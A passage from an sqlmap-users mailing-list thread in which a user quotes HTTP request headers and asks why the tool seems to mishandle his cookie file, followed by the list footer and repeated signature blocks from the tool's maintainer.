> > > > Accept-Encoding: gzip, deflate
> > > > Referer: <Referer>
> > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> > > > Connection: keep-alive
> > > > Content-Type: application/x-www-form-urlencoded
> > > > Content-Length: 67
> > > >
> > > > <abunchofpostparams>
> > > >
> > > >
> > > > No hints that cookie-file is not in correct format
> (I've been through this,
> > > > at least I think I so ;) ).
> > > >
> > > > Any insight would be much appreciated.
> > > >
> > > >
> > > > Cheers,
> > > >
> > > > Dirk
> > > >
> > > >
> > > >
> ------------------------------------------------------------------------------
> > > > Precog is a next-generation analytics platform
> capable of advanced
> > > > analytics on semi-structured data. The platform
> includes APIs for building
> > > > apps and a phenomenal toolset for data science.
> Developers can use
> > > > our toolset for easy data analysis & visualization.
> Get a free account!
> > > >
> http://www2.precog.com/precogplatform/slashdotnewsletter
> > > > _______________________________________________
> > > > sqlmap-users mailing list
> > > > sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>> <mailto:
> sql...@li... <mailto:
> sql...@li...> <mailto:
> sql...@li... <mailto:
> sql...@li...>>>
> > > >
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> > > >
> > > >
> > > >
> > > >
> > > > --
> > > > Miroslav Stampar
> > > > http://about.me/stamparm
> > >
> > >
> > >
> > >
> > > --
> > > Miroslav Stampar
> > > http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
> >
> >
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
>
>
--
Miroslav Stampar
http://about.me/stamparm
|
48 messages has been excluded from this view by a project administrator.
